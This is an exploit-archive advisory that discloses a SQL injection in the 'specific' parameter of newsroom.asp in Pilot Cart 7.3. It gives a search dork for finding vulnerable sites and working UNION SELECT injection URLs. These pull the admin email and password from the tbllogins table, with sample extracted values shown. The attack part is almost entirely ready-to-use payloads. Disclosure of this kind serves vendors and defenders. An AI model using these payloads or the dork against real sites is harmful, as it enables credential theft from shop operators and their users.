ASPilot Pilot Cart 7.3 newsroom.asp SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : ASPilot Pilot Cart 7.3 newsroom.asp SQL Injection Vulnerability
# Published : 2010-11-12
# Author : Daikin
# Previous Title : Joomla Component ccBoard 1.2-RC Multiple Vulnerabilities
# Next Title : Webmatic (index.php) SQL Injection Vulnerability

# Title: [ASPilot Pilot Cart 7.3 SQL Injection]
# Date: [12.11.2010]
# Author: [Daikin]
# Software Link: [http://www.pilotcart.com]
# Version: [7.3] maybe also lower
 
Vendor's Description of Software and demo:
# http://www.pilotcart.com
 
Dork:
# Powered by Pilot Cart V.7.3
 
Application Info:
# Name: Pilot Cart
# version last 7.3
 
Vulnerability Info:
# Type: SQL injection
# Discover 8/11/2010
 

#Vuln description:
Input passed via the "specific" parameter to newsroom.asp is not properly
sanitised before being used in a SQL query.

http://server/newsroom.asp?specific=[injection]

#Proof

http://server/newsroom.asp?specific=1

DB: MSAccess

http://server/newsroom.asp?specific=-1%20UNION%20ALL%20SELECT%20null,(select%20top%201%20chr(126)%2bchr(39)%2bcstr(email)%2bchr(39)%2bchr(126)%20from%20(select%20top%201%20*%20from%20(select%20top%201%20*%20from%20tbllogins%20order%20by%201)%20t%20order%20by%201%20desc)t),null,null,null,null,null%20from%20tbllogins
-->mail field "scarab"

http://server/newsroom.asp?specific=-1%20UNION%20ALL%20SELECT%20null,(select%20top%201%20chr(126)%2bchr(39)%2bcstr(pword)%2bchr(39)%2bchr(126)%20from%20(select%20top%201%20*%20from%20(select%20top%201%20*%20from%20tbllogins%20order%20by%201)%20t%20order%20by%201%20desc)t),null,null,null,null,null%20from%20tbllogins
-->pass field "R1ckr011"

#
Credit:
Daikin 

bolidebolidebolide@gmail.com